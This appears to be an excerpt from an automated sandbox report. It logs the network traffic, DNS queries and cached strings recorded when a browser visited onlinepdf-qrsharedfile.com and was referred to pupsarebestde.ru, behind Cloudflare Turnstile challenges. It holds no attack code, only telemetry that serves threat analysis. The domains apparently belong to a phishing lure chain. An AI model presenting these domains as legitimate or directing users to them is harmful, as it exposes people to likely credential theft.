Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d7c76e74f17e7bb/1729799100474/e8cc6bfcd974cb047485d94945af125403ea0eba4a6173fefbc168b3d4ab3c67/FSUmaMzuw_psFoU HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/rqmfb/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1925323196:1729797399:g37pL3I2Fo2Vok7htRJ4WdBDXWx02YngmwxM-TxMTqQ/8d7c76e74f17e7bb/VxrfLBVyqotNu1TZiTOF78m36xVsFK8lt5MsZShVoR8-1729799097-1.1.1.1-o_G2kEpeuA9iEfyTttTXLAh1gKhx8u0tLdGPg3DkkHOjXczfIs15_0NUghOMk2k9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1925323196:1729797399:g37pL3I2Fo2Vok7htRJ4WdBDXWx02YngmwxM-TxMTqQ/8d7c76e74f17e7bb/VxrfLBVyqotNu1TZiTOF78m36xVsFK8lt5MsZShVoR8-1729799097-1.1.1.1-o_G2kEpeuA9iEfyTttTXLAh1gKhx8u0tLdGPg3DkkHOjXczfIs15_0NUghOMk2k9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET // HTTP/1.1Host: pupsarebestde.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET // HTTP/1.1Host: pupsarebestde.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: pupsarebestde.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pupsarebestde.ru//Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pupsarebestde.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: pupsarebestde.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pupsarebestde.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pupsarebestde.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pupsarebestde.ru//Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pupsarebestde.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pupsarebestde.ru//Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: onlinepdf-qrsharedfile.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: pupsarebestde.ru
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: www.cloudflare.com

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 19:43:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 19:43:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mEw811O%2FHJoLxzfsR%2FOP8wMv8ga%2FAt11KTonVPyhenV3njFiblcMu01lHQjfxJfbzhYl%2BccPWP62WqaTuPh3BqM5mEP%2ByqT36whQ75OdrMg9hsU%2Fr8qMFnj04pYP7QP2cPVtE60Tp8kn2BD3jw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c74ffdba153f4-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=18526&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1468&delivery_rate=156557&cwnd=32&unsent_bytes=0&cid=b6a3118136dc3c82&ts=515&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:41 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 5BLE21MYytqZr7QS4bvminlfT7+RFY/HRMk=$dcqIoxNdbKh88fX7Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Lx2dgCAIFAXh5PgLok9soOjQb7E6tn8Y6W6Kw3de%2BO95kbnWGuD4R135At3innduImZ0pCV5CPkMFgYxJgVAViQqeoSjPdhzezQ3yAgMsM%2B8P%2BP%2Bv7ebCsE6gwpk6vIIJKpywg2HoGQYJX2fQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c750c6e5b0b95-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1178&delivery_rate=1885416&cwnd=236&unsent_bytes=0&cid=4bdbd1fb72989083&ts=151&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q5UhYlhdkRmUeRAntkrRtmQvtgQ3Hj%2BqdfTNmM9tt4kuKLjF%2FytCnq9qtOA7WOcD2GoVGfk70IX%2BNO%2BtrEOzH0ep6R%2B7eFCcvzkbgUdb2LkRwnI5%2FqWi5waS3Cgd0fspb2OR0oqPZa0%2FIQRX9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c75192bbd462f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1767&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1468&delivery_rate=1574768&cwnd=249&unsent_bytes=0&cid=a7176d6bfc3db53c&ts=482&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:44 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Tgt3HHKuas+ww7PEUd5Gkp66JGjwO8kPWDs=$0i/PijcL06idpMq5cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d7c751fc8766bea-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:49 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: /MTcW9GQs3+ygmaf2P0WDCSb5v+lNBXB4lk=$xhn5QrYduOESNnzrServer: cloudflareCF-RAY: 8d7c753c5ff47d5b-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:50 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: /EZWEaXB3pNQJCno7KtYQ7qlAF0qyhMM8BU=$CO+pSTwR9PpIcM2zServer: cloudflareCF-RAY: 8d7c75457eb56b6d-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:43:52 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: EHW9Xp5v33DXIhQTggbfB1NVXHNmI74FIEU=$B4b0fiPmNasTsSQ/cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gfkWb1VtHl9LVdI8YYxxW7VP3CdS8yHUaaZcSak8lY9XJrqpi70Ba2rNT2onygdb%2FjvYO7poO%2FwbPVwYvEXQyl9vBqm2plgYtAjiWR2G%2FfS6hrs8JmpoXnG%2FtGTP4slyZ8wUuVVbD%2FhvQyFFoA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c7553981c2e73-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1472&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1178&delivery_rate=2154761&cwnd=242&unsent_bytes=0&cid=aee59b42130d11a3&ts=153&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:44:04 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: j1bR4tJFn/VD4tzoj84LABbhUDnQPpTw+Qg=$lYELDy2ipoD7l9EKcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d7c759d9b7b2ca9-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:44:09 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: CtgnfcYgxitqVdSp+LEqVqdHGqBIsICWZhc=$xdTr35e40M1WtpVSServer: cloudflareCF-RAY: 8d7c75bbe9f7283f-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:44:16 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: MKY/Ylm4WTUgvRbcFhoXhTIbJxWZo6tRAlk=$kPTLrKCxOyDV1bYBServer: cloudflareCF-RAY: 8d7c75e8aece6b23-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:45:02 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: ++ULSlzgTKINP9r6hOUlE23/7OMgLi9OzH8=$NmAcuygPnLvcBSy9Server: cloudflareCF-RAY: 8d7c77070d1a6c2e-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:45:07 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Ky/H5/SXUorQB7rx4Kh0PXiC9YzQZlKb9UY=$FrtGZf/I6GMhK13Tcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d7c772329da6b95-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:45:09 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 79JYL+r4psllj4oO5WV8dmsxh68ND9PfS20=$Jg8jNgBy++344dmXServer: cloudflareCF-RAY: 8d7c77330fc0e843-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:45:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGohd0QGkj2nCMoSJEZdkLnJRmP5YKWwr1J4afMYGby1EItTly5OY0F3B%2F7TK2grpM%2Fquzp4P1gubZnm2w2aQu7OljGLdPAah%2BXeVBIJZT8T%2FImvdF75V%2BknFC0%2BfcKUVhkn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c77d1ff67a912-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1419&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1167&delivery_rate=2016713&cwnd=159&unsent_bytes=0&cid=9c8b74725a1d275d&ts=415&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:45:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wbQAwU7%2B11A8yD1c8WjB8jwWYi0sgIuxQqYTosmppNsOwCRoPwcR9Oq%2BfsJTZJIT%2B1O3Z%2BsF5FP6KSBxJmyTq3FZJ5dJBs%2BupMVp%2Br%2FpNl5btuk%2FGucSuBizqwbEIO4tza8Z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7c77dbebe80c13-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1167&delivery_rate=1333947&cwnd=246&unsent_bytes=0&cid=d6c1a2de9fcce96c&ts=263&x=0"

Source: chromecache_195.1.dr	String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: chromecache_171.1.dr, chromecache_205.1.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
Source: chromecache_171.1.dr, chromecache_205.1.dr	String found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js
Source: chromecache_185.1.dr	String found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: chromecache_181.1.dr, chromecache_199.1.dr	String found in binary or memory: https://fontawesome.com
Source: chromecache_181.1.dr, chromecache_199.1.dr	String found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_180.1.dr, chromecache_172.1.dr, chromecache_162.1.dr, chromecache_170.1.dr, chromecache_206.1.dr	String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_180.1.dr, chromecache_172.1.dr, chromecache_162.1.dr, chromecache_170.1.dr, chromecache_206.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_180.1.dr, chromecache_162.1.dr, chromecache_170.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#about
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#classic-cars
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#contact
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#electric-vehicles
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#faq
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#learn-more
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#modern-supercars
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#privacy
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#services
Source: chromecache_176.1.dr, chromecache_195.1.dr	String found in binary or memory: https://pupsarebestde.ru//#terms
Source: chromecache_185.1.dr	String found in binary or memory: https://www.cloudflare.com/favicon.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 60678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 60712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60669
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60667
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60666
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 60753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60675
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60674
Source: unknown	Network traffic detected: HTTP traffic on port 60672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60671
Source: unknown	Network traffic detected: HTTP traffic on port 60666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60670
Source: unknown	Network traffic detected: HTTP traffic on port 60691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60679
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60678
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60677
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60676
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 60683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60681
